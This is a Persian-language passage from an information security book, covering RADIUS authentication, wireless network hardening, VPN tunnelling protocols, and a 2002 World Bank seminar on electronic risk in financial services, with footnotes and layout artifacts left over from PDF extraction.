ﻣﻲﻛﻨﺪ ﻭ ﭘﺲ ﺍﺯ ﺍﻳﻨﻜﻪ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﻣﻮﺭﺩ ﺗﺄﻳﻴﺪ ﻗﺮﺍﺭ ﺩﺍﺩ ﺑﻪ ﻛﺎﺭﺑﺮ ﺍﺟﺎﺯﺓ
ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺧﺪﻣﺎﺕ ﺷﺒﻜﻪ ﺭﺍ ﻣﻲﺩﻫﺪ .ﻗﺴﻤﺘﻲ ﺍﺯ ﺁﻧﭽـﻪ RADIUS
ﻣﻲﺗﻮﺍﻧﺪ ﺁﻧﺮﺍ ﻓﺮﺍﻫﻢ ﻛﻨﺪ ،ﺍﺭﺗﺒﺎﻁ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﻣﻴﺎﻥ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ-
ﻫــﺎﻱ ﺭﺍﻩ ﺩﻭﺭ ﻭ ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﺓ RADIUSﺍﺳــﺖ .ﺷــﺒﻜﻪﻫــﺎﻱ
ﺧﺼﻮﺻﻲ ﻣﺠﺎﺯﻱ )VPNﻫـﺎ( ﻧﻴﺰ ﺑﺼﻮﺭﺕ ﻣﺸﺎﺑﻪ ﻛﺎﺭ ﻣـﻲﻛﻨﻨـﺪ ،ﺍﻣـﺎ
ﺑﺠﺎﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺍﺭﺗﺒﺎﻁ ﻣﻴﺎﻥ ﻣﻴﺰﺑﺎﻥ ﺭﺍﻩ ﺩﻭﺭ ﻭ ﺷﺒﻜﻪ ،ﻣﻴﺎﻥ ﺩﻭ ﺷـﺒﻜﻪ
ﺍﺭﺗﺒﺎﻁ ﺑﺮﻗﺮﺍﺭ ﻣﻲﺳﺎﺯﻧﺪ .ﭘﺲ ﺍﺯ ﺍﻳﻨﻜﻪ ﺭﺍﻳﺎﻧﺔ ﺭﺍﻩ ﺩﻭﺭ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ
ﺷﺪ ﻭ ﺑﻮﺳﻴﻠﺔ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ RADIUSﺑﻪ ﺷـﺒﻜﺔ ﺩﺍﺧﻠـﻲ ﻣﺘـﺼﻞ
ﮔﺸﺖ ،ﺑﮕﻮﻧﻪﺍﻱ ﻋﻤﻞ ﻣﻲﻛﻨﺪ ﻛـﻪ ﮔـﻮﻳﻲ ﺍﺯ ﻧﻈـﺮ ﻓﻴﺰﻳﻜـﻲ ﺩﺭ ﻛﻨـﺎﺭ
ﺷــﺒﻜﻪ ﻭ ﻣﺘــﺼﻞ ﺑــﻪ ﺁﻥ ﺍﺳــﺖ .ﺑــﻪ ﻋﺒــﺎﺭﺕ ﺩﻳﮕــﺮ ،ﺭﻣﺰﮔــﺬﺍﺭﻱ
ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﺓ RADIUSﺗﻨﻬــﺎ ﻣﻴــﺎﻥ ﺁﻥ ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﻩ ﻭ
ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﺓ ﺁﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ،ﻭ ﻧﻪ ﺩﺭ ﺗﻤﺎﻡ ﺷﺒﻜﻪ.
،Rick Fleming ۲۱۴ﻗﺎﺋﻢ ﻣﻘﺎﻡ ﺭﺋﻴﺲ ﺩﺍﻳﺮﺓ ﺍﻣﻨﻴﺖ ﺷﺮﻛﺖ Digital
Defense
215 Dual Homed
ﻛﺮﺩﻥ ﻣﻘﺼﺪ ﺗﺮﺍﻓﻴـﻚ ﺧـﺎﺭﺝﺷـﺪﻩ ﺍﺯ ﺷـﺒﻜﺔ ﺑـﻲﺳـﻴﻢ
ﻣﻲ ﺗﻮﺍﻥ ﺍﺯ ﻗﻮﺍﻧﻴﻦ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺍﺳﺘﻔﺎﺩﻩ ﻛـﺮﺩ .ﺍﻃﻤﻴﻨـﺎﻥ
ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻣﻴﺎﻥ ﺗﻤﺎﻡ ﻧﻘﺎﻁ ﺩﺳﺘﺮﺳـﻲ
ﺑﻲﺳﻴﻢ ﻭ ﺷﺒﻜﺔ ﺩﺍﺧﻠﻲ ﻳﺎ ﺍﻳﻨﺘﺮﻧﺖ ﻭﺟﻮﺩ ﺩﺍﺭﺩ.
.۱۵ﺳﺮﻭﻳﺲ DHCPﺭﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴﺪ ﻭ ﺑـﺮﺍﻱ ﻛﺎﺭﺗﻬـﺎﻱ
ﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ ﺧﻮﺩ ﺍﺯ ﺁﺩﺭﺱ IPﺛﺎﺑـﺖ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨﻴـﺪ.
ﻫﻤﭽﻨﻴﻦ ﻣﺤﺪﻭﺩﺓ ﭘﻴﺶ ﻓﺮﺽ ﺁﺩﺭﺱ IPﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ
ﺭﺍ ﺍﺯ ﺁﻧﭽﻪ ﺗﻮﻟﻴﺪﻛﻨﻨﺪﻩ ﺗﻌﻴﻴﻦ ﻛﺮﺩﻩ ﺗﻐﻴﻴﺮ ﺩﻫﻴﺪ.
.۱۶ﺗﻨﻬﺎ ﻧﻘﺎﻁ ﺩﺳﺘﺮﺳﻲ ﻗﺎﺑﻞ ﺍﺭﺗﻘﺎ ﺧﺮﻳﺪﺍﺭﻱ ﻛﻨﻴﺪ .ﻫﻤﻴـﺸﻪ
ﭘﻴﺸﺮﻓﺘﻬﺎﻳﻲ ﺩﺭ ﺍﻣﻨﻴﺖ ﺍﻳﻨﮕﻮﻧﻪ ﺍﺑﺰﺍﺭﻫﺎ ﺍﻳﺠﺎﺩ ﻣﻲﺷـﻮﺩ ،ﻭ
ﻟﺬﺍ ﺑﺎﻳﺪ ﻣﻄﻤﺌﻦ ﺑﺎﺷﻴﺪ ﻛﻪ ﻫﻤﻮﺍﺭﻩ ﺧﻮﺍﻫﻴﺪ ﺗﻮﺍﻧﺴﺖ ﻧﻘﺎﻁ
ﺩﺳﺘﺮﺳﻲ ﺧﻮﺩ ﺭﺍ ﺑﻪﺭﻭﺯ ﻧﮕﻬﺪﺍﺭﻳﺪ.
ﺍﻃﻼﻋﺎﺕ ﺩﻳﮕﺮﻱ ﺩﺭ ﺧﺼﻮﺹ VPN
ﺑﺮﺍﻱ ﻣﺤﺎﻓﻈـﺖ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ ﺳﻴـﺴﺘﻤﻬﺎﻳﻲ ﻛـﻪ ﺍﺯ ﻫﺮﻳـﻚ ﺍﺯ
ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﻣﺬﻛﻮﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ ،ﺑﺎﻳﺪ VPNﺭﺍﻩ ﺍﻧـﺪﺍﺯﻱ ﻛﻨﻴـﺪ،
ﺑﻄﻮﺭﻳﻜﻪ ﻫﻤﺔ gatewayﻫﺎ ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ﺷﺒﻜﺔ ﺩﺍﺧﻠﻲ ﺍﻳـﻦ
VPNﺑﺎﺷﻨﺪ ﻭ ﻫﺮ ﻛﺎﺭﺑﺮ ﻫﻨﮕﺎﻡ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺷﺒﻜﻪﻫﺎﻱ ﻣـﻮﺭﺩ
ﺍﻃﻤﻴﻨﺎﻥ ،ﺍﺯ ﺍﻳﻦ ﻣﻜـﺎﻧﻴﺰﻡ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨـﺪ .ﺍﺳﺎﺳـﹰﺎ VPNﻳـﻚ
ﺍﺗﺼﺎﻝ ﺧﺼﻮﺻﻲ ﻣﻴﺎﻥ ﺩﻭ ﺩﺳﺘﮕﺎﻩ ﺍﺳﺖ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﻣﺤﺮﻣﺎﻧﻪ
ﺭﺍ ﺩﺭ ﻳﻚ ﺷـﺒﻜﺔ ﻋﻤـﻮﻣﻲ ﻭ ﺑـﻪﺍﺷـﺘﺮﺍﻙ ﮔﺬﺍﺷـﺘﻪﺷـﺪﻩ ﻣﺜـﻞ
ﺍﻳﻨﺘﺮﻧﺖ ﺑـﺼﻮﺭﺕ ﺍﻣـﻦ ﺍﻧﺘﻘـﺎﻝ ﻣـﻲﺩﻫـﺪ .ﻓﻨـﺎﻭﺭﻱ VPNﺑـﻪ
ﺳﺎﺯﻣﺎﻥ ﺍﻣﻜﺎﻥ ﻣﻲﺩﻫﺪ ﻛﻪ ﺧﺪﻣﺎﺕ ﺷﺒﻜﺔ ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ
ﺭﺍﻩ ﺩﻭﺭ ،ﻭﺍﺣﺪﻫﺎ ،ﻭ ﺷﺮﻛﺘﻬﺎﻱ ﻫﻤﻜﺎﺭ ﺑﺼﻮﺭﺕ ﺍﻳﻤﻦ ﻭ ﺍﺯ ﻃﺮﻳﻖ
ﺍﻳﻨﺘﺮﻧﺖ ﺩﺭ ﺩﺳﺘﺮﺱ ﻗﺮﺍﺭ ﺩﻫﺪ .ﺑﻪ ﻋﺒﺎﺭﺕ ﺩﻳﮕﺮ VPNﺍﻳﻨﺘﺮﻧﺖ
ﺭﺍ ﺑﻪ ﻳﻚ ﺷﺒﻜﺔ ﺷﺒﻴﻪﺳﺎﺯﻱﺷﺪﺓ ﺧـﺼﻮﺻﻲ ٢١٦WANﺗﺒـﺪﻳﻞ
ﻣﻲﻛﻨﺪ VPN .ﻫﻤﭽﻨﻴﻦ ﺑـﻪ ﻛـﺎﺭﺑﺮﺍﻥ ﺭﺍﻩ ﺩﻭﺭ ﺍﻳـﻦ ﺍﻣﻜـﺎﻥ ﺭﺍ
ﻣﻲﺩﻫﺪ ﻛـﻪ ﺑﺘﻮﺍﻧﻨـﺪ ﺑـﻪ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩﻫـﺎﻱ ﺷـﺮﻛﺖ ﺧـﻮﺩ
ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ.
ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ﺑﻌﻨﻮﺍﻥ ﻳـﻚ ﺷـﺒﻜﺔ ﺍﺭﺗﺒـﺎﻃﻲ ﻭﺳـﻴﻊ
ﺧﺼﻮﺻﻲ ،ﺳﺎﺯﻣﺎﻧﻬﺎ ﺑﺎﻳﺪ ﺑـﺮ ﺩﻭ ﻣـﺎﻧﻊ ﺍﺻـﻠﻲ ﻓـﺎﺋﻖ ﺁﻳﻨـﺪ .ﺍﻭﻝ
ﺍﻳﻨﻜﻪ ﺷﺒﻜﻪﻫﺎ ﻏﺎﻟﺒﹰﺎ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭘﺮﻭﺗﻜﻠﻬﺎﻱ ﻣﺨﺘﻠﻔـﻲ ﺍﺭﺗﺒـﺎﻁ
ﺑﺮﻗﺮﺍﺭ ﻣﻲﻛﻨﻨﺪ ،ﺍﻣﺎ VPNﺭﺍﻫﻲ ﺑﺮﺍﻱ ﻋﺒﻮﺭ ﭘﺮﻭﺗﻜﻠﻬﺎﻳﻲ ﻏﻴﺮ ﺍﺯ
IPﺍﺯ ﻳﻚ ﺷﺒﻜﻪ ﺑﻪ ﺷﺒﻜﺔ ﺩﻳﮕﺮ ﻓﺮﺍﻫﻢ ﻣـﻲﺳـﺎﺯﺩ .ﺩﻭﻡ ﺍﻳﻨﻜـﻪ
ﺑﺴﺘﻪﻫﺎﻱ ﺍﻃﻼﻋـﺎﺕ ﺩﺭ ﺍﻳﻨﺘﺮﻧـﺖ ﺑـﺼﻮﺭﺕ ﻣـﺘﻦﺳـﺎﺩﻩ ﺍﻧﺘﻘـﺎﻝ
216 Wide Area Network
٢١٣
ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﻣﻲﻳﺎﺑﻨﺪ ،ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﻫـﺮﻛﺲ ﻛـﻪ ﺑﺘﻮﺍﻧـﺪ ﺗﺮﺍﻓﻴـﻚ ﺍﻳﻨﺘﺮﻧـﺖ ﺭﺍ
ﺑﺒﻴﻨﺪ ،ﺧﻮﺍﻫﺪ ﺗﻮﺍﻧـﺴﺖ ﺍﻃﻼﻋـﺎﺕ ﻣﻮﺟـﻮﺩ ﺩﺭ ﺑـﺴﺘﻪﻫـﺎ ﺭﺍ ﻧﻴـﺰ
ﻼ
ﺑﺨﻮﺍﻧﺪ .ﺍﻳﻦ ﻳﻚ ﻣﺸﻜﻞ ﺑـﺰﺭﮒ ﺍﺳـﺖ ،ﺑﺨـﺼﻮﺹ ﺍﮔـﺮ ﻣـﺜ ﹰ
ﺑﺎﻧﻜﻬــﺎ ﺑﺨﻮﺍﻫﻨــﺪ ﺍﺯ ﺍﻳﻨﺘﺮﻧــﺖ ﺑــﺮﺍﻱ ﺗﺒــﺎﺩﻝ ﺩﺍﺩﻩﻫــﺎﻱ ﻣﻬــﻢ ﻭ
ﻣﺤﺮﻣﺎﻧﺔ ﺗﺠﺎﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ VPN .ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻜـﺎﻧﻴﺰﻣﻲ
ﺑﻪ ﻧﺎﻡ ﺗﻮﻧﻞ ٢١٧ﺑﺮ ﺍﻳﻦ ﻣﺸﻜﻼﺕ ﻏﻠﺒﻪ ﻣﻲﻛﻨﺪ .ﺩﺭ ﺍﻳﻦ ﻣﻜـﺎﻧﻴﺰﻡ
ﺩﺍﺩﻩ ﻫﺎ ﺑﺠﺎﻱ ﺍﺭﺳﺎﻝﺷﺪﻥ ﺑﺼﻮﺭﺕ ﻋﺎﺩﻱ ،ﺑﺮﺍﻱ ﺍﻣﻨﻴـﺖ ﺑﻴـﺸﺘﺮ
ﺍﺑﺘﺪﺍ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﺷﻮﻧﺪ ،ﺩﺭﻭﻥ ﻳﻚ ﺑﺴﺘﺔ IPﻗﺮﺍﺭ ﻣﻲ ﮔﻴﺮﻧـﺪ،
ﻭ ﺳﭙﺲ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺭﺳﺎﻝ ﻣﻲﮔﺮﺩﻧﺪ.
217 Tunneling
۲۱۸ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ IETFﺩﺭﺣﺎﻝ ﺍﺻﻼﺡ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ VPNﺍﺳـﺖ ﺗـﺎ
IPSecﺭﺍ ﺍﻳﻤﻦﺗﺮ ﻭ ﻧﻴﺰ ﺑﺎ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻣﺎﻫﻮﺍﺭﻩﺍﻱ ﺳﺎﺯﮔﺎﺭ ﻛﻨﺪ.
Point-to-Point Protocol
Link Layer
Point-to-Point Tunneling
Layer 2 Tunneling Protocol
۲۲۳ﻣﻘﺎﻟﺔ Karen Bannasﺑﺎ ﻋﻨﻮﺍﻥ " "Safe Passageﺩﺭ ﻣﺠﻠﺔ
،PC Magazineﻫﻔــﺖ ﺷــﺮﻛﺖ ﺍﺭﺍﺋــﻪﺩﻫﻨــﺪﺓ VPNﺭﺍ ﺑــﺮﺍﻱ
ﻣﺤﺼﻮﻻﺕ ﻣﻨﺎﺳﺐ ﺟﻬﺖ ﻛﺎﺭﺑﺮﺩ ﺩﺭ ﺷﺮﻛﺘﻬﺎﻱ ﻣﺘﻮﺳﻂ ﺑـﺎ ﺑﻮﺩﺟـﻪﺍﻱ
ﺣﺪﻭﺩ ﺩﻩ ﻫﺰﺍﺭ ﺩﻻﺭ ﻛﻪ ﺑﻪ VPNﺑﺮﺍﻱ ﺍﺭﺗﺒﺎﻁ ﻣﻴﺎﻥ ﺩﻓﺘـﺮ ﻣﺮﻛـﺰﻱ ﻭ
ﺷﻌﺒﻪﻫﺎ ﻧﻴﺎﺯ ﺩﺍﺭﻧﺪ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﻣﻲﺩﻫﺪ:
http://www.pcmag.com/
print_article/0,3048,a%3D12352,00.asp
219
220
221
222
ﺑﺨﺶ ﺳﻮﻡ
ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺤـﺼﻮﻻﺕ ﻣﺜـﻞ ﻣﺤـﺼﻮﻻﺕ ،Cisco ،Nokia
،Checkpoint ،Nortelﻭ Microsoftﺩﺍﺭﺍﻱ ﻓﻨــــــﺎﻭﺭﻱ
VPNﺍﻳﻤﻦ ﻭ ﻣﻨﺎﺳﺐ ﻫﺴﺘﻨﺪ ٢١٨ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭ ﻧﻘﺎﻁ ﻣﺨﺘﻠﻒ
ﺷﺒﻜﻪ ﻗﺮﺍﺭ ﮔﻴﺮﺩ .ﺍﮔﺮﭼﻪ VPNﺍﺯ ﻣﺤﺘـﻮﺍﻱ ﺩﺍﺩﻩﻫـﺎﻱ ﺗﺒـﺎﺩﻟﻲ
ﺭﻭﻱ ﺷﺒﻜﻪ ﺣﻔﺎﻇﺖ ﻣﻲﻛﻨﺪ ،ﺍﻣـﺎ ﺑـﺴﺘﻪ ﺑـﻪ ﺍﻳﻨﻜـﻪ ﭼﮕﻮﻧـﻪ ﺩﺭ
ﺷـﺒﻜﻪ ﻗـﺮﺍﺭ ﮔﺮﻓﺘـﻪ ﺑﺎﺷــﺪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻧﺘﻮﺍﻧـﺪ ﺍﺯ ﺩﺳﺘﺮﺳــﻲ
ﻏﻴﺮﻣﺠﺎﺯ ﺍﺯ ﺑﻴﺮﻭﻥ ﺷﺒﻜﻪ ﺟﻠﻮﮔﻴﺮﻱ ﻧﻤﺎﻳـﺪ .ﺑـﻪ ﻋﺒـﺎﺭﺕ ﺩﻳﮕـﺮ
ﻫﺮﭼﻨﺪ ﻛﺎﺭﺑﺮ ﻏﻴﺮﻣﺠﺎﺯ ﺑﺨﺎﻃﺮ ﻭﺟﻮﺩ VPNﻧﻤﻲﺗﻮﺍﻧﺪ ﻣﺤﺘـﻮﺍﻱ
ﺩﺍﺩﻩﻫﺎ ﺭﺍ ﺑﺒﻴﻨﺪ ،ﺍﻣﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﻫﻤﭽﻨﺎﻥ ﺑﺘﻮﺍﻧﺪ ﺑﻪ ﻣﻨﺎﺑﻊ ﺷﺒﻜﻪ
ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻛﻨﺪ ﻭ ﭘﻬﻨﺎﻱ ﺑﺎﻧﺪ ﺭﺍ ﺑﮕﻮﻧـﻪﺍﻱ ﺗﻐﻴﻴـﺮ ﺩﻫـﺪ ﻛـﻪ
ﻇﺮﻓﻴﺖ ﺷﺒﻜﻪ ﺳﺮﺭﻳﺰ ﺷﻮﺩ ﻭ ﻋﻠﻴﻪ ﻛﺎﺭﺑﺮﺍﻥ ﻣﺠﺎﺯ ﺣﻤﻠﺔ ﺗﺨﺮﻳﺐ
ﺳﺮﻭﻳﺲ ﺍﻧﺠـﺎﻡ ﮔﻴـﺮﺩ .ﻛﻨﺘـﺮﻝ ﺩﺳﺘﺮﺳـﻲ ،ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﻭ
ﺭﻣﺰﮔــﺬﺍﺭﻱ ﺍﺯ ﻋﻨﺎﺻــﺮ ﺣﻴــﺎﺗﻲ ﻳــﻚ ﺍﺗــﺼﺎﻝ ﺍﻣــﻦ ﻫــﺴﺘﻨﺪ .ﺍﺯ
ﭘﺮﻭﺗﻜﻞ ﻧﻘﻄﻪ ﺑﻪ ﻧﻘﻄﻪ ) ٢١٩(PPPﺑﺮﺍﻱ ﻣﺪﺕ ﻣﺪﻳـﺪﻱ ﺑﻌﻨـﻮﺍﻥ
ﭘﺮﻭﺗﻜﻞ ﺟﻬﺎﻧﻲ ﻻﻳﺔ ﺍﺗﺼﺎﻝ ٢٢٠ﺟﻬﺖ ﺍﻳﺠﺎﺩ ﺗﻮﻧﻞ ﻣﻴﺎﻥ ﺍﺑﺰﺍﺭﻫـﺎ
ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﺪ؛ ﺍﻣﺎ ﺩﺭ ﺳﺎﻟﻬﺎﻱ ﺍﺧﻴﺮ ﭘﺮﻭﺗﻜﻞ ﺗﻮﻧـﻞ
٢٢٢
ﻧﻘﻄﻪ ﺑﻪ ﻧﻘﻄﻪ )٢٢١(PPTPﻭ ﭘﺮﻭﺗﻜﻞ ﺗﻮﻧﻞ ﻻﻳـﺔ ﺩﻭ )(L2TP
٢٢٣
ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ ﺗﺮﺟﻴﺢ ﺩﺍﺩﻩ ﺷﺪﻩﺍﻧﺪ.
٢١٥
ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﻓﺼﻞ ﺳﻴﺰﺩﻫﻢ
ﮔﻔﺘﮕﻮﻫﺎﻱ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ
ﭘﻴﺮﺍﻣﻮﻥ ﻣﻮﺿﻮﻉ ﺍﻣﻨﻴﺖ
ﻛﻠﻴﺎﺕ
ﺳﻤﻴﻨﺎﺭ ﺟﻬﺎﻧﻲ ﺳﺎﻝ :۲۰۰۲
٢٢٥
ﻛﺎﻫﺶ ﻣﺨﺎﻃﺮﻩ ﺩﺭ ﺣﻮﺯﺓ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ
ﺟﻠﺴﻪ ﺑﺎ ﻣﻘﺪﻣـﻪﺍﻱ ﺑـﺮ ﻣﺨـﺎﻃﺮﺓ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ٢٢٦ﺁﻏـﺎﺯ ﺷـﺪ ﻭ
ﻣﻘﺎﻻﺕ ﺑﻪ ﺗﺒﺪﻳﻞ ﺷﺪﻥ "ﺷﺒﻜﻪﻫﺎﻱ ﺑﺴﺘﻪ" ﺑﻪ "ﺷﺒﻜﻪﻫـﺎﻱ ﺑـﺎﺯ"
ﺩﺭ ﺧﻼﻝ ﺩﻩ ﺳـﺎﻝ ﺍﺧﻴـﺮ ﺍﺷـﺎﺭﻩ ﺩﺍﺷـﺘﻨﺪ .ﺩﺭ ﺷـﺒﻜﻪﻫـﺎﻱ ﺑـﺎﺯ،
ﻭﺍﺑﺴﺘﮕﻲ ﺑﻪ ﻗﺎﺑﻠﻴﺘﻬـﺎﻳﻲ ﻣﺜـﻞ SSLﻛـﻪ ﺍﺧﻴـﺮﹰﺍ ﺍﻟﮕـﻮﺭﻳﺘﻢ ﺁﻥ
ﺷﻜﺴﺘﻪ ﺷﺪﻩ ﺑﻮﺩ ﺑﺎﻋﺚ ﺑﺮﻭﺯ ﻣﺸﻜﻼﺗﻲ ﻣﻲﺷﺪ ،ﭼﺮﺍﻛﻪ ﺍﻳﻦ ﺍﻣﺮ
۲۲۴ﻓﺎﻳﻞ ﻭﻳﺪﺋﻮﻳﻲ ﺧﻼﺻﺔ ﻣﺬﺍﻛﺮﺍﺕ ﻧﺸـﺴﺘﻬﺎﻱ ﺳـﺎﻟﻬﺎﻱ ۲۰۰۲ﻭ ۲۰۰۳
ﺍﺯ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ ﺑﺘﺮﺗﻴﺐ ﺑﺎ ﺁﺩﺭﺳﻬﺎﻱ ﺯﻳـﺮ ﻗﺎﺑـﻞ ﺩﺳﺘﺮﺳـﻲ
ﻫﺴﺘﻨﺪ:
http://www.worldbank.org/wbi/B-Span/sub_esecurity.htm
http://www1.worldbank.org/finance
۲۲۵ﺍﻳﻦ ﺟﻠﺴﻪ ﺑﺎ ﺣﻀﻮﺭ ﺍﻋـﻀﺎﻱ ﮔـﺮﻭﻩ ﻳﻜﭙﺎﺭﭼـﻪﺳـﺎﺯﻱ ﺑﺎﻧـﻚ ﺟﻬـﺎﻧﻲ
ﺑﺮﮔـﺰﺍﺭ ﺷﺪ .ﺍﻋﻀـﺎﻱ ﺣﺎﺿﺮ ﺩﺭ ﺟﻠﺴـﻪ ﻋﺒﺎﺭﺕ ﺑﻮﺩﻧﺪ ﺍﺯThomas :
،Tom Kellerman ،Glaessnerﻭ ،Valerie McNevin
ﺑﻌﻼﻭﺓ ﺷﺮﻛﺖﻛﻨﻨﺪﮔﺎﻥ ﺩﺭ ﺍﻳﻦ ﺳﻤﻴﻨﺎﺭ ﺟﻬﺎﻧﻲ ﺍﺯ ﺍﺯ ﻛﺸﻮﺭﻫﺎﻱ ﺑﺮﺯﻳﻞ،
ﺷﻴﻠﻲ ،ﻣﻜﺰﻳﻚ ،ﺍﻭﻛﺮﺍﻳﻦ ،ﺍﺳﻠﻮﻭﺍﻛﻲ ،ﺳﻨﮕﺎﭘﻮﺭ ،ﻛﺮﺓ ﺟﻨﻮﺑﻲ ،ﻓﻴﻠﻴﭙـﻴﻦ،
ﻫﻨﮓﻛﻨﮓ ،ﺳﺮﻳﻼﻧﻜﺎ ،ﻭ ﺟﻤﻬﻮﺭﻱ ﺧﻠﻖ ﭼﻴﻦ
226 E-Risk
ﻛﻼﻫﺒﺮﺩﺍﺭﻳﻬﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑﺨـﺼﻮﺹ ﺩﺭ ﻧﻔﻮﺫﻫـﺎﻳﻲ ﻛـﻪ ﺍﺯ
ﺍﺭﻭﭘﺎﻱ ﺷﺮﻗﻲ ﻋﻠﻴﻪ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺍﻧﺠـﺎﻡ ﻣـﻲ ﮔﻴـﺮﺩ ﻏﺎﻟﺒـﹰﺎ ﻳـﺎ
ﺳﺮﻗﺖ ﻫﻮﻳﺖ ﻭ ﻳﺎ ﺍﺧﺎﺫﻱ ﺑﻮﺩﻩﺍﻧﺪ .ﺭﻭﺷﻬﺎﻱ ﺩﻳﮕﺮ ﻧﻴﺰ ﻋﺒﺎﺭﺗﻨـﺪ
ﺍﺯ ،٢٢٧salami slicingﺍﻧﺘﻘــﺎﻝ ﺳــﺮﻣﺎﻳﻪ ،ﻭ ﺩﺳــﺘﻜﺎﺭﻱ ﺩﺭ
ﺳــﻬﺎﻡ .ﺩﺭ ﺁﺳــﻴﺎ ،ﻧﻔﻮﺫﻫــﺎ ﻣﺘﻮﺟــﻪ ﺍﻫــﺪﺍﻑ ﻣــﺸﺨﺺ ﺑﺨــﺶ
ﺍﻗﺘﺼﺎﺩﻱ ﻭ ﻫﻤﭽﻨﻴﻦ ﺍﻫﺪﺍﻑ ﺣﻴـﺎﺗﻲ ﺑﺨـﺸﻬﺎﻱ ﻓﻨـﺎﻭﺭﻱ ﺑـﻮﺩﻩ
ﺍﺳﺖ.
ﺑﺤـــﺚ ﻣﻘـــﺪﻣﺎﺗﻲ ﻣﺨـــﺎﻃﺮﺍﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـــﻲ ﺑـــﻪ ﻣﻮﺿـــﻮﻉ
ﺁﺳﻴﺐ ﭘﺬﻳﺮﻳﻬﺎﻱ ﻓﻨﺎﻭﺭﻱ ﺑﻲﺳﻴﻢ ﺑﺨـﺼﻮﺹ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ GSM
ﻫﻢ ﭘﺮﺩﺍﺧﺖ .ﺑﻪ ﺩﻭ ﻧﻜﺘﺔ ﻛﻠﻴﺪﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﻣﺨﺎﻃﺮﺍﺕ ﻓﻨـﺎﻭﺭﻱ
ﺑﻲﺳـﻴﻢ ﺍﺷـﺎﺭﻩ ﺷـﺪ ﻛـﻪ ﻋﺒـﺎﺭﺕ ﺑﻮﺩﻧـﺪ ﺍﺯ ﺁﺳـﻴﺐ ﭘـﺬﻳﺮﻳﻬﺎﻱ
gatewayﻭ ﺣﻤـﻼﺕ " ."man in the middleﻣـﻮﺭﺩ ﺩﻭﻡ
ﺑﻪ ﺍﻳﻦ ﺩﻟﻴﻞ ﺍﺗﻔﺎﻕ ﻣﻲﺍﻓﺘﺪ ﻛﻪ ﺑﺮﺟﻬﺎﻱ ﺗﻠﻔﻦ ﻫﻤﺮﺍﻩ ﻧﻤﻲﺗﻮﺍﻧﻨـﺪ
